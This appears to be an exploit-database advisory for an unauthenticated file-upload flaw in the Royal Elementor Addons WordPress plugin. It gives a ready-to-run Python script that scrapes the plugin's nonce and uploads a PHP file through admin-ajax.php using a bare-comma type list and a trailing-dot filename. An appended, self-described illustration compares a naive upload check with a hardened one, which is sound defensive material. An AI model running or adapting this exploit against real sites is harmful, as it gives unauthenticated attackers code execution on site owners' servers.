wpexploit | Fioravante Souza | WPEX-ID: C2CF5FD1-663D-4BC1-ADCD-E6064EB32ECE
History: Oct 23, 2023 - 12:00 a.m.

Royal Elementor Addons and Templates 1.4.78 - Unauthenticated Arbitrary File Upload

2023-10-23 00:00:00
Fioravante Souza
Tags: elementor, unauthenticated, file upload, security, exploit

AI Score: 9.6 High (Confidence: High)
EPSS: 0.911 High (Percentile: 98.9%)

Description: The plugin does not properly validate uploaded files, which allows unauthenticated users to upload arbitrary files, such as PHP scripts, and achieve RCE. Note that this vulnerability is identical to https://wpscan.com/vulnerability/281518ff-7816-4007-b712-63aed7828b34/, as the flaw was reintroduced in the 1.4.x branch in error.

Make sure Elementor is installed and that a page or post has been edited with Elementor: the script fetches the plugin's nonce from such a page before issuing the upload request.

Here's the Python script that executes the exploit.

import io
import re
import sys
from urllib import parse

import requests

if len(sys.argv) != 2:
    print('USAGE: python %s <target_elementor_page>' % (sys.argv[0],))
    sys.exit(1)

elementor_url = sys.argv[1].rstrip('/')
parsed_url = parse.urlparse(elementor_url)
root_url = f'{parsed_url.scheme}://{parsed_url.netloc}'

with requests.Session() as s:
    print('# Getting nonce..')
    # A page rendered with Elementor embeds a WprConfig JS object whose "nonce"
    # is the wpr_addons_nonce value the upload handler expects.
    page = s.get(elementor_url).text
    match = re.search(r'WprConfig = \{.*"nonce":"([a-f0-9]+)"', page)
    if match is None:
        print('Error: Couldn\'t get nonce.')
        sys.exit(1)
    nonce = match.group(1)

    print('# Uploading shell..')
    shell = io.BytesIO(b'<?php phpinfo();')
    data = {
        'wpr_addons_nonce': nonce,
        'max_file_size': 100,
        'allowed_file_types': ',',  # client-supplied type list, sent as the exploit requires
        'action': 'wpr_addons_upload_file',
        'triggering_event': 'click',
    }
    file = {
        'uploaded_file': ('phpinfo.php.', shell),  # trailing dot is intentional
    }
    print(s.post(f'{root_url}/wp-admin/admin-ajax.php', data=data, files=file).text)
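Why the request above gets through, as an added illustration that is not code from the advisory, its author, or the plugin: the exploit sends `allowed_file_types` as a bare comma and a filename that ends in a dot, which is exactly what defeats an upload check that trusts a client-supplied type list and keys on the text after the last dot. The `naive_is_allowed` function below is a constructed stand-in for that class of check (the plugin's real handler is not on this page and may differ in detail); `hardened_is_allowed` is the shape of a check that would reject the upload: a server-side allowlist, path and trailing-dot normalisation, and a deny list applied to every dotted segment so that `shell.php.jpg` fails too. The function names, the allowlist contents and the sample filenames are all assumptions.

```python
import os
import re

# Server-side allowlist a hardened handler enforces regardless of what the
# client sends (assumption: the plugin's real list is not on the page).
SERVER_ALLOWED_TYPES = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}

# Extensions that must never appear in any dotted segment of the name,
# because a misconfigured web server may execute them (e.g. "shell.php.jpg").
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}


def naive_is_allowed(filename, client_allowed_types):
    """Constructed stand-in for the flawed pattern, NOT the plugin's code:
    trusts the client's comma-separated allowed_file_types list and takes
    the extension as whatever follows the last dot."""
    allowed = client_allowed_types.split(",")
    ext = filename.rsplit(".", 1)[-1] if "." in filename else ""
    # "phpinfo.php." has an empty extension, and "," yields ["", ""], so
    # the empty string matches and the PHP file is accepted.
    return ext in allowed


def hardened_is_allowed(filename, client_allowed_types=None):
    """Ignores any client-supplied list, normalises the name, and checks every
    dotted segment against a server-side allowlist and a deny list."""
    # Drop directory components and trailing dots/spaces (Windows and Apache
    # quirks that let "x.php." be stored and served as "x.php").
    name = os.path.basename(filename).rstrip(". ").lower()
    parts = name.split(".")
    if len(parts) < 2 or not parts[0]:
        return False  # no extension, or a dotfile such as .htaccess
    base, segments = parts[0], parts[1:]
    if not re.fullmatch(r"[a-z0-9_-]+", base):
        return False  # keep the base name to a conservative character set
    if any(seg in EXECUTABLE_EXTENSIONS for seg in segments):
        return False  # reject PHP-ish segments anywhere, not just at the end
    return segments[-1] in SERVER_ALLOWED_TYPES


def compare(filename, client_allowed_types):
    """Return (naive_result, hardened_result) for one upload attempt."""
    return (naive_is_allowed(filename, client_allowed_types),
            hardened_is_allowed(filename, client_allowed_types))


if __name__ == "__main__":
    # Constructed sample uploads; the first row is the exploit's own filename
    # and allowed_file_types value.
    samples = [
        ("phpinfo.php.", ","),
        ("shell.php", "jpg,php"),
        ("shell.php.jpg", "jpg"),
        ("photo.jpg", "jpg,png"),
        ("../evil.png", "png"),
        (".htaccess", "htaccess"),
    ]
    for fname, types in samples:
        naive, hardened = compare(fname, types)
        print(f"{fname!r:18} allowed_file_types={types!r:14} "
              f"naive={naive!s:5} hardened={hardened}")
```

Running the block prints one line per sample; the first row shows the naive check accepting the exploit's filename while the hardened check rejects it, and the `shell.php` row shows that a client-controlled type list alone is enough to pass a PHP file through the naive check even without the trailing-dot trick.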
